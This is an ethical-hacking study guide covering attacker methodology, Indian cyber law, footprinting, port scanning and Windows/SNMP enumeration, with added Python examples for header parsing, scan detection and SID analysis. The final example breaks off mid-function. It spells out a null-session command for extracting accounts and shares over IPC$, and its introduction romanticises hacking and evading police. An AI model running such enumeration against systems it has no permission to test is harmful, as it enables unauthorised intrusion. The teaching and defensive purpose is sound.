
Page 1: HACKING – The Art of Exploitation (docshare01.docshare.tips/files/8937/89379080.pdf)

Study Material by

Sponsored by

Disclaimer

Material provided here is compiled from different sources and Technobuzz or Impeccable Trainers do not guarantee 100% accuracy of information. If you find something wrong, let us know at [email protected]

HACKING – The Art of Exploitation

1. INTRODUCTION TO ETHICAL HACKING

Hacking is the most exhilarating game on the planet. But it stops being fun when you end up in a cell. But hacking doesn't have to mean breaking laws.

Here we teach safe hacking so that you don't have to keep looking back over your shoulder for narks and cops.

What we're talking about is hacking as a healthy recreation, and as a free education that can qualify you for a high-paying job. In fact, many network systems administrators, computer scientists and computer security experts first learned their professions not in some college program, but from the hacker culture. And you may be surprised to discover that ultimately the Internet is safeguarded not by law enforcement agencies, not by giant corporations, but by a worldwide network of, yes, HACKERS.

You too can become one of us.

And hacking can be surprisingly easy.

However, before you plunge into the hacker subculture, be prepared for that hacker attitude. You have been warned.

So... welcome to the adventure of HACKING!

WHAT DO I NEED IN ORDER TO HACK?

You may wonder whether hackers need expensive computer equipment and a shelf full of technical manuals. The answer is NO!

Hacking can be surprisingly easy! Better yet, if you know how to search the Web, you can find almost any computer information you need for free.

In fact, hacking is so easy that if you have an on-line service and know how to send and read email, you can start hacking immediately.

We see many hackers making a big deal of themselves, being mysterious and refusing to help others learn how to hack. Why? Because they don't want you to know the truth, which is that most of what they are doing is really very simple!

Well, we thought about this. We too could enjoy the pleasure of insulting people who ask us how to hack. Or we could get big egos by actually teaching thousands of people how to hack.

HOW NOT TO GET BUSTED?

One slight problem with hacking is that if you step over the line, you can go to jail. We will do our best to warn you when we describe hacks that could get you into trouble with the law. But we are not attorneys or experts on cyber law. In addition, every state and every country has its own laws, and these laws keep on changing. So you have to use a little sense.

But the best protection against getting busted is the Golden Rule. If you are about to do something that you would not like to have done to you, forget it. Do hacks that make the world a better place, or that are at least fun and harmless, and you should be able to keep out of trouble.

ETHICS AND LEGALITIES:

Nothing contained in this Cram Session is intended to teach or encourage the use of security tools or methodologies for illegal or unethical purposes. Always act in a responsible manner. Make sure you have written permission from the proper individuals before you use any of the tools or techniques described in this Cram Session.

TERMINOLOGIES:

Exploit: According to the Jargon Dictionary, an exploit is defined as "a vulnerability in software that is used for breaking security". Hackers rely on exploits to gain access to, or to escalate their privileges on, targeted systems.

SECURITY TRIANGLE: [figure] a triangle with CONFIDENTIALITY, INTEGRITY and AVAILABILITY at its corners and SECURITY at its centre.

SOFTWARE TRIANGLE: [figure] a triangle with SECURITY, FUNCTIONALITY and EASY TO USE at its corners and SOFTWARE at its centre.

ATTACKER'S PROCESS:

Attackers follow a fixed methodology. The steps involved in attacks are shown below:

Footprinting
Scanning
Enumeration
Penetration (individuals that are unsuccessful at this step may opt for a Denial of Service attack)
Escalation of Privilege
Cover Tracks
Backdoors

RECONNAISSANCE:

Reconnaissance is one of the most important steps of the hacking process. Before an actual vulnerability can be exploited it must be discovered. Discovery of potential vulnerabilities is aided by identification of the technologies used, the operating systems installed, and the services/applications that are present.

Reconnaissance can broadly be classified into two categories:

Passive Reconnaissance
Active Reconnaissance

TYPES OF ATTACKS:

There are several ways in which hackers can attack your network. No matter which path of opportunity they choose, their goal is typically the same: control and use of your network and its resources.

LAN Attack
WAN Attack
Physical Entry
Stolen Equipment
Unsecured Wireless Access
Dialup Attack

CATEGORIES OF EXPLOITS:

An exploit is the act of taking advantage of a known vulnerability. When ethical hackers discover new vulnerabilities, they usually inform the product vendor before going public with their findings. This gives the vendor some time to develop solutions before the vulnerability can be exploited. Some of the most common types of exploits involve: program bugs, buffer overflows, viruses, worms, Trojan horses, Denial of Service and social engineering.

GOALS OF HACKER:

While the type of attack may vary, the hacker will typically follow a set methodology. This includes:

Reconnaissance
Gaining Access
Maintaining Access
Covering Tracks

ETHICAL HACKER & CRACKER:

Historically the term HACKER was not viewed in a negative manner. It referred to someone who enjoys exploring the nuances of programs, applications and operating systems. The term CRACKER usually refers to a "Criminal Hacker", a person who uses his skills with malicious intent.

Q. Who are Ethical Hackers?

Successful ethical hackers possess a variety of skills. First and foremost, they must be completely trustworthy. Ethical hackers typically have very strong programming and computer networking skills. They are also adept at installing and maintaining systems that use the more popular operating systems (e.g., Linux or Windows) used on target systems. These base skills are augmented with detailed knowledge of the hardware and software provided by the more popular computer and networking hardware vendors.

CATEGORIES OF ETHICAL HACKER:

White Hat Hackers – perform ethical hacking to help secure companies and organizations.
Reformed Black Hat Hackers – claim to have changed their ways and that they can bring special insight into the ethical hacking methodology.
Gray Hat Hackers – individuals who work both offensively and defensively, depending on the situation.

NEED OF INFORMATION TECHNOLOGY IN THE WORLD:

Security compliance is a must for all companies with an IT backbone. The requirement is highest for organizations in the IT / ITES segment. Information workers lack basic security knowledge. Information security training is being offered to professionals in IT security.

BENEFITS OF INFORMATION TECHNOLOGY:

Be an information security professional. Prepare for the hacking threats of tomorrow. Secure desktops and LANs from crackers. Understand attacks via viruses, worms and Trojans, and how to prevent them. Implement IDS. Understand technical attacks like DDoS, SQL injection etc. and take precautions. Secure your sensitive data using cryptography and steganography. Secure your emails and take precautions against email attacks. Understand the various levels at which you might get hacked. Stop cyber terrorism. Use Google as an aid to information security. Carry out cyber investigations and computer forensics. Understand mobile security and related problems. Learn and implement router security.

TYPES OF TESTING/EVALUATION:

Internal Evaluation
External Evaluation
Stolen Equipment Evaluation

2. CYBER ETHICS

COMPUTER CRIME:

The United States Department of Justice defines computer crime as "any violation of criminal law that involved the knowledge of computer technology for its perpetration, investigation, or prosecution."

VARIOUS LAWS:

Spy Act
U.S. Federal Laws
United Kingdom's Cyber Laws
European Laws
Japan's Cyber Laws
Australia: The Cyber Crime Act 2001
Indian Law: The Information Technology Act
Germany's Cyber Law
Singapore's Cyber Law
Belgian Law
Brazilian Law
Canadian Law
French Law
Italian Law

"CYBER CRIME" is an amorphous field. It refers broadly to any criminal activity that pertains to or is committed through the use of the Internet. A wide variety of conduct fits within this capacious definition. We will concentrate on five activities that have been especially notorious and that have especially seriously strained the fabric of traditional criminal law: use of the Internet to threaten or stalk people; ONLINE FRAUD; "HACKING"; ONLINE DISTRIBUTION OF CHILD PORNOGRAPHY; and CYBERTERRORISM.

CYBER STALKERS:

"Stalkers harness the tremendous power of the Web to learn about their prey and to broadcast false information about the people they target. And the Internet - the same tool they use to investigate and spread terror - provides stalkers with almost impenetrable anonymity." In cyberspace, stalking and harassment may occur via e-mail and through user participation in news groups, bulletin boards, and chat rooms. One major difference from off-line stalking is that cyberstalkers can also dupe other Internet users into harassing or threatening victims.

The term "CYBERSTALKING" has been coined to refer to the use of the Internet, e-mail, or other electronic communications devices to stalk another person. Because of the emerging nature of this form of stalking, the available evidence of cyberstalking is still largely anecdotal, but it suggests that the majority of cyberstalkers are men and the majority of their victims are women. As in off-line stalking, in many on-line cases the cyberstalker and the victim had a prior relationship, and when the victim attempts to end the relationship, the cyberstalking begins.

IT ACT 2000 (Information Technology Act, 2000):

Sec 66. Hacking with computer system.

(1) Whoever with the intent to cause or knowing that he is likely to cause wrongful loss or damage to the public or any person destroys or deletes or alters any information residing in a computer resource or diminishes its value or utility or affects it injuriously by any means, commits hack.

(2) Whoever commits hacking shall be punished with imprisonment up to three years, or with fine which may extend up to two lakh rupees, or with both.

Sec 67. Publishing of information which is obscene in electronic form.

Whoever publishes or transmits or causes to be published in the electronic form, any material which is lascivious or appeals to the prurient interest or if its effect is such as to tend to deprave and corrupt persons who are likely, having regard to all relevant circumstances, to read, see or hear the matter contained or embodied in it, shall be punished on first conviction with imprisonment of either description for a term which may extend to five years and with fine which may extend to one lakh rupees and in the event of a second or subsequent conviction with imprisonment of either description for a term which may extend to ten years and also with fine which may extend to two lakh rupees.

Sec 65. Tampering with computer source documents.

Whoever knowingly or intentionally conceals, destroys or alters or intentionally or knowingly causes another to conceal, destroy or alter any computer source code used for a computer, computer programme, computer system or computer network, when the computer source code is required to be kept or maintained by law for the time being in force, shall be punishable with imprisonment up to three years, or with fine which may extend up to two lakh rupees, or with both.

Sec 43. Penalty for damage to computer, computer system, etc.

If any person without permission of the owner or any other person who is in charge of a computer, computer system or computer network,

(a) accesses or secures access to such computer, computer system or computer network;
(b) downloads, copies or extracts any data, computer data base or information from such computer, computer system or computer network including information or data held or stored in any removable storage medium;
(c) introduces or causes to be introduced any computer contaminant or computer virus into any computer, computer system or computer network;
(d) damages or causes to be damaged any computer, computer system or computer network, data, computer data base or any other programs residing in such computer, computer system or computer network;
(e) disrupts or causes disruption of any computer, computer system or computer network;
(f) denies or causes the denial of access to any person authorized to access any computer, computer system or computer network by any means;
(g) provides any assistance to any person to facilitate access to a computer, computer system or computer network in contravention of the provisions of this Act, rules or regulations made thereunder;
(h) charges the services availed of by a person to the account of another person by tampering with or manipulating any computer, computer system, or computer network,

he shall be liable to pay damages by way of compensation not exceeding one crore rupees to the person so affected.

TRAFFICKING:

"Trafficking in counterfeit labels for phone records, copies of computer programs or computer program documentation or packaging, and copies of motion pictures or other audio visual works."

The law is applicable if:

A person knowingly traffics in a counterfeit label affixed or designed to be affixed.
A person intentionally traffics in a counterfeit document or packaging for a computer program.

Penalty:

Fine and imprisonment are imposed.

3. INFORMATION GATHERING & SCANNING

FOOTPRINTING:

Footprinting is the process of gathering as much information about an organization as possible. The objective of footprinting is to gather this information in such a way as to not alert the organization. This information is publicly available from third parties and from the organization itself.

WEB BASED TOOLS:

Many web based tools are available to help uncover domain information. These services provide whois information, DNS information, and network queries.

Eg:

Sam Spade http://www.samspade.org
Geek Tools http://www.geektools.com
Betterwhois http://betterwhois.com
Dshield http://www.dshield.org

IANA

The Internet Assigned Numbers Authority is a nonprofit organization that is responsible for preserving the central functions of the global Internet for the public good. IANA is a good starting point for determining details about a domain. IANA lists all the top level domains of each country and their associated technical and administrative contacts. Most of the associated domains will allow you to search by the domain name.

RIRs

Regional Internet Registries are granted authority by ICANN to allocate IP address blocks within their respective geographical areas. These databases are an excellent resource to use to further research a domain once you have determined what area of the world it is located in.

Domain Location and Path Discovery

If you are unsure of a domain's location, the best way to determine it is by use of the traceroute command. Traceroute determines a path to a domain by incrementing the TTL field of the IP header. When the TTL falls to zero, an ICMP message is generated. These ICMP messages identify each particular hop on the path to the destination. There are several good GUI based traceroute tools available. These tools draw a visual map that displays the path and destination. NeoTrace and VisualRoute are two GUI based tools that map path and destination.

ARIN, RIPE and Regional Databases

RIRs are searchable by IP address. If you have the domain name, you can resolve it to the IP by pinging the domain name. RIRs and their areas of control include:

American Registry for Internet Numbers (ARIN)
Réseaux IP Européens Network Coordination Centre (RIPE NCC)
Asia Pacific Network Information Centre (APNIC)
African Network Information Centre (AFRINIC)
Latin America and Caribbean Network Information Centre (LACNIC)

Determining the Network Range

You can query the RIR to find out what network range the organization owns. If you choose the wrong RIR, you will typically receive an error message that will point you to the correct record holder.

Discovering the Organization's Technology

There are many ways in which individuals can passively determine the technology an organization uses. Some examples are JOB BOARDS and GOOGLE GROUPS.

Email Tips & Tricks

The Simple Mail Transfer Protocol is used for sending email. Every email you receive has a header that contains information such as the IP address of the server sending the message, the names of any attachments included with the email, and the time and date the email was sent and received.

Bouncing Email

One popular technique is to send an email to an invalid email address. The sole purpose of this activity is to examine the SMTP header that will be returned. This may reveal the email server's IP address, application type and version. Another way to track interesting email is to use software that will allow you to verify where the email originated and how the recipient handled it, such as eMailTrackerPro and MailTracking.com.
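As an added example that is not part of this study material, the following Python script walks the Received: chain of a constructed bounce message with the standard library's email package, recovering per hop the relaying host, the IP address recorded for it, the MTA software it announced and the timestamp, which is exactly the information the bounce technique above exposes. All hosts, addresses, ids and dates in the sample are invented.

```python
import re
from email import message_from_string
from email.utils import parsedate_to_datetime

# Constructed sample bounce (NDR) of the kind returned for mail sent to an
# invalid address. Hosts, IPs, ids and dates are invented for this example.
SAMPLE_BOUNCE = """\
Return-Path: <>
Received: from mx1.example-corp.test (mx1.example-corp.test [203.0.113.25])
\tby mail.myisp.test (Postfix) with ESMTP id 4F2C1A7
\tfor <analyst@myisp.test>; Tue, 12 May 2020 09:15:33 +0000
Received: from app-smtp.internal.example-corp.test ([10.20.30.40])
\tby mx1.example-corp.test (Exim 4.92) with ESMTP id 1jYt7Z-0001xQ
\tfor <nobody-here@example-corp.test>; Tue, 12 May 2020 09:15:31 +0000
From: Mail Delivery System <MAILER-DAEMON@example-corp.test>
To: analyst@myisp.test
Subject: Undelivered Mail Returned to Sender
Date: Tue, 12 May 2020 09:15:33 +0000

This is the mail system at host mx1.example-corp.test.
"""

# 'from <host> (<comment>) by <host> (<software>) ...' as written by most MTAs
RECEIVED_RE = re.compile(
    r"from\s+(?P<from_host>\S+)\s*(?:\((?P<from_comment>[^)]*)\))?"
    r"\s+by\s+(?P<by_host>\S+)\s*(?:\((?P<by_software>[^)]*)\))?",
    re.IGNORECASE,
)
IPV4_RE = re.compile(r"\b(\d{1,3}(?:\.\d{1,3}){3})\b")


def parse_received_chain(raw_message):
    """Return the Received: hops in transit order (origin first).

    Each MTA prepends its own Received: header, so the first one in the
    message is the most recent hop; reversing the list gives the path taken.
    """
    msg = message_from_string(raw_message)
    hops = []
    for value in msg.get_all("Received", []):
        clauses, _, date_part = value.rpartition(";")
        m = RECEIVED_RE.search(clauses)
        if not m:
            continue                      # unparseable hop: skip, do not guess
        ip = IPV4_RE.search(m.group("from_comment") or "")
        try:
            stamp = parsedate_to_datetime(date_part.strip())
        except (TypeError, ValueError):
            stamp = None
        hops.append({
            "from_host": m.group("from_host"),
            "from_ip": ip.group(1) if ip else None,
            "by_host": m.group("by_host"),
            "by_software": (m.group("by_software") or "").strip() or None,
            "timestamp": stamp,
        })
    hops.reverse()
    return hops


def server_fingerprints(hops):
    """Per host, what the chain leaks: the MTA software it announced in its
    'by' clause and the address the next hop recorded for it in 'from'."""
    info = {}
    for hop in hops:
        info.setdefault(hop["by_host"], {"software": None, "ip": None})
        if hop["by_software"]:
            info[hop["by_host"]]["software"] = hop["by_software"]
        info.setdefault(hop["from_host"], {"software": None, "ip": None})
        if hop["from_ip"]:
            info[hop["from_host"]]["ip"] = hop["from_ip"]
    return info


if __name__ == "__main__":
    chain = parse_received_chain(SAMPLE_BOUNCE)
    for n, hop in enumerate(chain, 1):
        print(f"hop {n}: {hop['from_host']} [{hop['from_ip']}] -> "
              f"{hop['by_host']} ({hop['by_software']}) at {hop['timestamp']}")
    for host, leak in server_fingerprints(chain).items():
        print(f"{host}: software={leak['software']} ip={leak['ip']}")
```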

SCANNING:

Once a hacker has moved to the scanning phase his goal will be to identify active systems. There are several ways this identification can take place. The methods of identification of active systems include:

War Dialing
War Driving
Pinging
Port Scanning

Regardless of the method chosen the goal is still the same:

Identify that the system is live
Determine its services
Verify its OS
Pinpoint its vulnerabilities

War Dialing

While some may see war dialing as a dated art, it still has its place in the hacker's arsenal of tools. If a thorough footprint has been performed, phone numbers were most likely found that can be associated with the organization. The numbers can serve as a starting point for war dialing scans. The hacker's goal will be to uncover modems that may have been left open. Administrators may have configured these for out-of-band management. The goal of an ethical hacker is to uncover these devices during the security audit to make sure they are removed, as modems offer a way to bypass the corporate firewall. The tools most commonly used for war dialing include: THC-Scan, PhoneSweep War Dialer and Telesweep.

War Driving

This mode of penetration relies on finding unsecured wireless access points. A popular tool used for this operation is NetStumbler.

ICMP – Ping

Using the ping command is one of the easiest ways to determine if a system is reachable. Ping is actually an ICMP (Internet Control Message Protocol) echo request-response. Its original purpose was to provide diagnostic abilities to determine whether a network or device was reachable. The important thing to remember about ping is that just because a system does not respond to ping, that doesn't mean that it is not up. It might simply mean that ICMP type 0 (echo reply) and/or type 8 (echo request) messages have been blocked by the target organization. There are many tools available that can be used to automate the ping process. These tools will typically ping sweep an entire range of addresses. Some of these include: Pinger, Friendly Pinger, WS_Ping_Pro, NetScan Tools Pro 2000, Hping2, and KingPing.

Detecting Ping Sweeps

Most IDS systems, such as Snort, will detect ping sweeps. While performing a ping sweep is not illegal, it should alert an administrator, as it is generally part of the pre-attack phase.

Port Scanning

Port scanning allows a hacker to determine what services are running on the systems that have been identified. If vulnerable or insecure services are discovered, the hacker may be able to exploit these to gain unauthorized access. There are a total of 65,535 * 2 ports (TCP & UDP). While a complete scan of all these ports may not be practical, an analysis of popular ports should be performed. Many port scanners ping first, so make sure to turn this feature off to avoid missing systems that have blocked ICMP. Popular port scanning programs include: Nmap, NetScan Tools, SuperScan and Angry IP Scanner.

TCP Basics

As TCP is a reliable service, a three-step startup (the three-way handshake) is performed before data is transported. ACKs are sent to acknowledge data transfer and a four-step shutdown is completed at the end of a communications session. TCP uses flags (Urgent, Acknowledgement, Push, Reset, Synchronize, and Finish) to accomplish these tasks. Port scanners manipulate these flag settings to bypass firewalls and elicit responses from targeted systems.

TCP Scan Types

Most port scanners make full TCP connections. Stealth scanners do not make full connections and may not be detected by some IDS systems. Nmap is one of the most popular port scanners. Some common types of port scans are: Ping Scan, SYN Scan, Full Scan, ACK Scan and XMAS Scan.
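The defender's view of the two techniques above, ping sweeps (Detecting Ping Sweeps) and flag-manipulating TCP scans (TCP Scan Types), as an added Python example that is not part of this study material: it names the probe type behind a TCP flag combination and then runs simple threshold detection over a constructed packet log. The log, the thresholds and the ten-second window are assumptions made for the example.

```python
from collections import defaultdict

# TCP flag bits, as laid out in the flags byte of the TCP header
FIN, SYN, RST, PSH, ACK, URG = 0x01, 0x02, 0x04, 0x08, 0x10, 0x20
XMAS = FIN | PSH | URG


def classify_tcp_flags(flags):
    """Name the probe implied by a flag combination (see TCP Scan Types above)."""
    if flags == 0:
        return "NULL"                 # no flags at all: never sent by a real client
    if (flags & XMAS) == XMAS and not (flags & (SYN | ACK)):
        return "XMAS"                 # FIN+PSH+URG "lit up": classic stealth probe
    if flags == SYN:
        return "SYN"                  # half-open probe, or a normal connection start
    if flags == ACK:
        return "ACK"                  # ACK probe for firewall mapping, or mid-stream
    if flags == FIN:
        return "FIN"
    return "OTHER"                    # SYN/ACK, PSH/ACK, RST ... ordinary traffic


# Constructed packet log. Fields: (time_s, proto, src, dst, dport, tcp_flags,
# icmp_type). Addresses come from documentation ranges; none of this is real.
SAMPLE_PACKETS = (
    # one source sends ICMP echo requests (type 8) to six different hosts
    [(0.01 * i, "icmp", "198.51.100.7", f"192.0.2.{i}", None, None, 8)
     for i in range(1, 7)]
    # another source sends lone SYNs to eleven ports on one host, then an XMAS probe
    + [(1.0 + 0.05 * i, "tcp", "198.51.100.9", "192.0.2.10", p, SYN, None)
       for i, p in enumerate([21, 22, 23, 25, 80, 110, 135, 139, 443, 445, 3389])]
    + [(2.0, "tcp", "198.51.100.9", "192.0.2.10", 80, XMAS, None)]
    # a benign client: one ping, then an ordinary HTTPS connection
    + [(3.0, "icmp", "192.0.2.50", "192.0.2.1", None, None, 8),
       (3.1, "tcp", "192.0.2.50", "192.0.2.10", 443, SYN, None),
       (3.2, "tcp", "192.0.2.50", "192.0.2.10", 443, ACK, None)]
)

PROBE_KINDS = {"SYN", "ACK", "FIN", "XMAS", "NULL"}


def detect_scans(packets, sweep_hosts=5, scan_ports=10, window_s=10.0):
    """Return alerts as (kind, source, detail) tuples.

    Thresholds are assumptions for the example: a source that pings at least
    sweep_hosts distinct hosts, or probes at least scan_ports distinct ports on
    one host, within a window_s-second bucket is reported. XMAS and NULL packets
    are reported individually because no normal TCP stack emits them.
    """
    pinged = defaultdict(set)          # (src, bucket)      -> hosts sent echo requests
    probed = defaultdict(set)          # (src, dst, bucket) -> ports hit with probes
    alerts = []
    for t, proto, src, dst, dport, flags, icmp_type in packets:
        bucket = int(t // window_s)
        if proto == "icmp" and icmp_type == 8:
            pinged[(src, bucket)].add(dst)
        elif proto == "tcp":
            kind = classify_tcp_flags(flags)
            if kind in ("XMAS", "NULL"):
                alerts.append((f"{kind}_PROBE", src, f"{dst}:{dport}"))
            if kind in PROBE_KINDS:
                probed[(src, dst, bucket)].add(dport)
    for (src, _), hosts in pinged.items():
        if len(hosts) >= sweep_hosts:
            alerts.append(("PING_SWEEP", src, f"{len(hosts)} hosts"))
    for (src, dst, _), ports in probed.items():
        if len(ports) >= scan_ports:
            alerts.append(("PORT_SCAN", src, f"{dst}: {len(ports)} ports"))
    return alerts


if __name__ == "__main__":
    for alert in detect_scans(SAMPLE_PACKETS):
        print(alert)
```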

UDP Basics

UDP is a connectionless protocol. If ICMP has been blocked at the firewall, it can be much harder to scan for UDP ports than TCP ports, as there may be no returned response. Just as with TCP, hackers will look for services that can be exploited such as chargen, daytime, tftp, and echo. One of the best UDP and TCP port scanners is Nmap.

Nmap (network mapper) is an open source port scanner that has the capability to craft packets in many different ways. This allows the program to determine what services an OS is running.

Port Scan Countermeasures

Practice the principle of least privilege. Don't leave unneeded ports open and block ICMP echo requests at the firewall or external router. Allow traffic through the external router to only specific hosts.

Fingerprinting

Fingerprinting is the process of determining the OS that is running on the target system.

I. Active Stack Fingerprinting

Active stack fingerprinting relies on subtle differences in the responses to specially crafted packets. The most well-known program used for active stack fingerprinting is Nmap. The -O option is used for fingerprinting. For a reliable prediction, one open port and one closed port are required.

II. Passive Stack Fingerprinting

Passive fingerprinting is less reliable than active fingerprinting. Its primary advantage is that it is stealthy. It relies on capturing packets sent from the target system.

Banner Grabbing

Banner grabbing is used to identify services. Banner grabbing works by making connections to the various services on a host and looking at the response to hopefully determine the exact service and version running on that port. Once these services are confirmed, this information can help to identify possible vulnerabilities and the OS that the system is running. Netcraft, Telnet and FTP are some of the common tools used to grab banners.

Identifying Vulnerabilities

Once a hacker has completed the scanning steps described in this section, he will attempt to identify vulnerabilities. Vulnerabilities are typically flaws or weaknesses in the software or the OS. Vulnerabilities lead to risk and this presents a threat to the target being scanned. Three terms to remember include:

Vulnerability - A flaw or weakness in software.
Risk - The likelihood of a threat exploiting a vulnerability such that a hacker will be allowed unauthorized access or create a negative impact.
Threat - The potential for a hacker to use a vulnerability.

Enumeration:

Enumeration is the process of identifying each domain that is present within the LAN. These domains are typically identified using built-in Windows commands. The "net" command is the most widely used of these commands. Once the various domains have been identified, each host can be further enumerated to uncover its role. Likely targets of malicious hackers include: PDCs, dual homed computers, database servers, and web servers. The very act of Windows enumeration is possible because these computers advertise themselves via browse lists. To see a good example of this technology, take a look at Network Neighborhood on Windows systems. These services are identifiable by the ports that can be found while performing the network scans that were discussed in the previous section. The ports associated with these services are as follows:

135 – MS-RPC Endpoint Mapper
137 – NetBIOS Name Service
138 – NetBIOS Datagram Service
139 – NetBIOS Session Service
445 – SMB over TCP/IP (Windows 2K and above)

NetBIOS Null Sessions

Once individual computers are identified, malicious hackers will next attempt to discover the role of the system by using NetBIOS Null Sessions. The legitimate purpose of a Null Session is to allow unauthenticated computers to obtain browse lists from servers, allow system accounts access to network resources, or to allow a null session pipe. A null session pipe is used when a process on one system needs to communicate with a process on another system. Legitimate null sessions are established over the IPC$ share.

The Inter-Process Communication Share

Windows computers communicate with each other over the IPC$ "Inter-Process Communication" share. It is used for data sharing between applications and computers. On Windows NT and 2000 computers, it is on by default. You can think of IPC$ as the pipeline that facilitates file and print sharing. This is a huge vulnerability, as hackers can connect to your IPC$ share using the net use command (net use \\IP\IPC$ "" /u:""). Once this connection has been made, many types of sensitive information can be retrieved, such as user names, comments, shares, and logon policies. What is most alarming about this vulnerability is that the attacker is able to log on with a null username and null password.

NBTSTAT

The NBTSTAT command can be used to further identify the services that are running on a particular system. For a listing of the type codes and their corresponding services, visit the following link:

http://jcifs.samba.org/src/docs/nbtcodes.html

Active Directory Enumeration

To perform an Active Directory enumeration, you must have access to port 389 (LDAP server). You must also be able to authenticate yourself as a guest or user. Then, if these conditions are met, enumeration of users and groups can proceed. Removing compatibility with all pre-Windows 2000 computers during the installation of Active Directory can prevent this vulnerability.

Identifying Win2000 Accounts

Every object in Windows has a unique security identifier (SID). The SID is made up of two parts. The first part identifies the domain and is unique to it. The second part is a descriptor of the specific account. This second part is referred to as the relative identifier (RID). These follow a specific order and are tied to unique roles within the domain. RIDs are defined as follows:

Account          RID
Administrator    500
Guest            501
Domain users     1000 (and up)

So, while some administrators may promote the practice of "security through obscurity" and rename accounts such as Administrator, the RID of the account will remain unchanged. Tools such as USER2SID and SID2USER can be used to determine the true administrator account of the domain.
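As an added Python example (not from this study material), the helper below parses SIDs of the form S-1-5-21-...-RID into domain identifier and RID and uses the fixed RIDs in the table above to find a renamed built-in Administrator in a constructed account listing, the same check USER2SID/SID2USER let you do by hand. The domain SID and the account names are invented.

```python
import re

# Windows SID text form: S-<revision>-<identifier authority>-<sub-authorities...>
SID_RE = re.compile(r"^S-(?P<rev>\d+)-(?P<auth>\d+)(?P<subs>(?:-\d+)+)$")

# Fixed RIDs from the table above; domain-created accounts start at 1000.
WELL_KNOWN_RIDS = {500: "Administrator", 501: "Guest"}


def parse_sid(sid):
    """Split a SID into (domain identifier, RID).

    The RID is the last sub-authority; everything before it identifies the
    domain (or the local machine). Malformed input raises ValueError.
    """
    m = SID_RE.match(sid)
    if not m or m.group("rev") != "1":
        raise ValueError(f"not a well-formed SID: {sid!r}")
    subs = [int(x) for x in m.group("subs").split("-")[1:]]
    domain = "S-1-" + m.group("auth") + "".join(f"-{s}" for s in subs[:-1])
    return domain, subs[-1]


def identify_role(name, sid, domain_sid):
    """Describe what the RID says about an account, regardless of its name."""
    domain, rid = parse_sid(sid)
    if domain != domain_sid:
        return "not an account of this domain"
    role = WELL_KNOWN_RIDS.get(rid)
    if role is None:
        return "domain-created account" if rid >= 1000 else "other well-known RID"
    if name.lower() == role.lower():
        return role
    return f"{role} (renamed to {name})"


def find_true_admin(accounts, domain_sid):
    """Return the name of the account holding RID 500 in domain_sid, or None.
    accounts is an iterable of (name, sid) pairs."""
    for name, sid in accounts:
        domain, rid = parse_sid(sid)
        if domain == domain_sid and rid == 500:
            return name
    return None


# Constructed domain SID and account listing for the example (not real values)
DOMAIN_SID = "S-1-5-21-1004336348-1177238915-682003330"
SAMPLE_ACCOUNTS = [
    ("sysop",         DOMAIN_SID + "-500"),    # the real Administrator, renamed
    ("Administrator", DOMAIN_SID + "-1105"),   # decoy carrying the famous name
    ("Guest",         DOMAIN_SID + "-501"),
    ("jdoe",          DOMAIN_SID + "-1001"),
    ("svc_backup",    "S-1-5-21-9-9-9-1002"),  # account from another domain
]

if __name__ == "__main__":
    for name, sid in SAMPLE_ACCOUNTS:
        print(f"{name:14} {sid:48} {identify_role(name, sid, DOMAIN_SID)}")
    print("true administrator:", find_true_admin(SAMPLE_ACCOUNTS, DOMAIN_SID))
```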

DumpSec

DumpSec is another tool that will allow for account enumeration. Once a null session has been established, this GUI tool will display information on users, account data, shares, and account policies.

Null Session Countermeasures

Disable File and Print Sharing. Inside network properties, under Advanced Settings, disable NetBIOS over TCP/IP. Null sessions require access to ports 135-139 or 445. Blocking access to these ports will also prevent these exploits. There is also a setting in Settings -> Control Panel -> Administrative Tools -> Local Security Policy -> Local Policies -> Security Options -> Restrict Anonymous. In Windows 2000, this registry key has three possible settings:

0 – No restrictions
1 – Allow null sessions but disallow account enumeration
2 – No null sessions are allowed

The default setting is "0". A setting of "2" should be verified on a test network before use in a production setting, as some older or custom applications may not function properly with it.

Account Enumeration

Account enumeration is a further probing of accounts. Before a concerted attack can take place, account policies and shares must be uncovered. As well, before attempting to connect to an active account, the attacker must identify an open share to which he can connect. Also, if there is a lockout policy in place, this must be determined. Otherwise, running tools such as NAT may result in the lockout of all accounts. This will do the attacker little good unless he is attempting DoS. Tools such as Enum, UserInfo, GetAcct, and SNMPUtil can be used to accomplish this task.

SNMP Enumeration

SNMP (Simple Network Management Protocol) is a network management standard widely used within TCP/IP networks. It provides a means of managing routers, switches, and servers from a central location, and works through a system of agents and managers. SNMP provides only limited security through the use of community strings. The defaults are "public" and "private", and they are transmitted over the network in clear text. SNMP-enabled devices share a lot of information about themselves that probably should not be shared with unauthorized parties. Hence, change the default community strings, which function as passwords.

SNMPUtil is a Windows enumeration tool that can be used to query computers running SNMP.

IP Network Browser

SolarWinds IP Network Browser is a GUI-based network discovery tool. It can run a detailed discovery of one device or of an entire subnet.

SNMP Enumeration Countermeasures

As with all other services, the principle of least privilege should also be followed here. If you don't need SNMP, turn it off. You should always seek to remove or disable all unnecessary services. If you must use SNMP, change the default community strings and block port 161 at key points throughout the network.
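The community string really is readable in every SNMPv1/v2c datagram. The following added Python example (not part of the original material, and independent of SNMPUtil or SolarWinds) builds an SNMPv1 GetRequest with a hand-written BER encoder, decodes the version and community back out of the raw bytes, and flags captured packets that still use "public" or "private". The capture, its addresses and the second community string are constructed.

```python
# Hand-rolled BER helpers: just enough ASN.1 to build and read an SNMPv1/v2c
# message header, so no SNMP library is required.
SNMP_GET_REQUEST = 0xA0
DEFAULT_COMMUNITIES = {"public", "private"}


def _tlv(tag, value):
    """Encode one tag-length-value (short-form length only, value < 128 bytes)."""
    if len(value) >= 128:
        raise ValueError("short-form length only")
    return bytes([tag, len(value)]) + value


def _read_tlv(buf, pos):
    """Decode one tag-length-value at pos; return (tag, value, position after it)."""
    tag, length = buf[pos], buf[pos + 1]
    pos += 2
    if length & 0x80:  # long-form length: low 7 bits give the byte count
        n = length & 0x7F
        length = int.from_bytes(buf[pos:pos + n], "big")
        pos += n
    return tag, buf[pos:pos + length], pos + length


def build_v1_get(community, oid=b"\x2b\x06\x01\x02\x01\x01\x01\x00"):
    """SNMPv1 GetRequest for one OID (default sysDescr.0, 1.3.6.1.2.1.1.1.0)."""
    varbind = _tlv(0x30, _tlv(0x06, oid) + _tlv(0x05, b""))
    pdu = _tlv(
        SNMP_GET_REQUEST,
        _tlv(0x02, b"\x01")  # request-id
        + _tlv(0x02, b"\x00")  # error-status
        + _tlv(0x02, b"\x00")  # error-index
        + _tlv(0x30, varbind),
    )
    # The community is a plain OCTET STRING right after the version field.
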